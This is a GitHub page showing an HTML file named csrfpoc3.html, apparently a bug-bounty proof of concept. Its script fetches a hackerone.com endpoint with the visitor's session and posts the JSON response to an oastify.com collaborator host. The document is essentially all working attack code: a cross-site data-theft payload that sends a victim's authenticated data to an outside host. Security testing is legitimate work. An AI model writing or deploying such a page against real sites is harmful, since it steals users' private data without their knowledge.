-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathcsrfpoc3.html
48 lines (45 loc) · 1.62 KB
/
csrfpoc3.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
<!DOCTYPE html>
<html>
<body>
<form action="https://hackerone.com/stories-of-2024/new" method="GET">
<input type="submit" value="Submit request" />
</form>
<script>
// Prevent the form from submitting right away to allow processing
document.forms[0].onsubmit = function(event) {
event.preventDefault(); // Prevent the default form submission
history.pushState('', '', '/');
// Make the fetch request to hackerone.com
fetch('https://hackerone.com/stories-of-2024/new')
.then(response => {
if (!response.ok) {
throw new Error('Failed to fetch from hackerone');
}
return response.json(); // Assuming the response is JSON
})
.then(data => {
// Send the data from hackerone to site2.com
return fetch('https://cxdnh7ra397a36vxhf6qat1vdmjd7cv1.oastify.com', {
method: 'POST', // Using POST for sending data
headers: {
'Content-Type': 'application/json'
},
body: JSON.stringify(data) // Send the data as JSON
});
})
.then(response2 => {
if (!response2.ok) {
throw new Error('Failed to fetch from site2');
}
return response2.json(); // Assuming site2 responds with JSON
})
.then(data2 => {
console.log('Response from site2:', data2); // Handle the response from site2
})
.catch(error => {
console.error('Error:', error);
});
};
</script>
</body>
</html>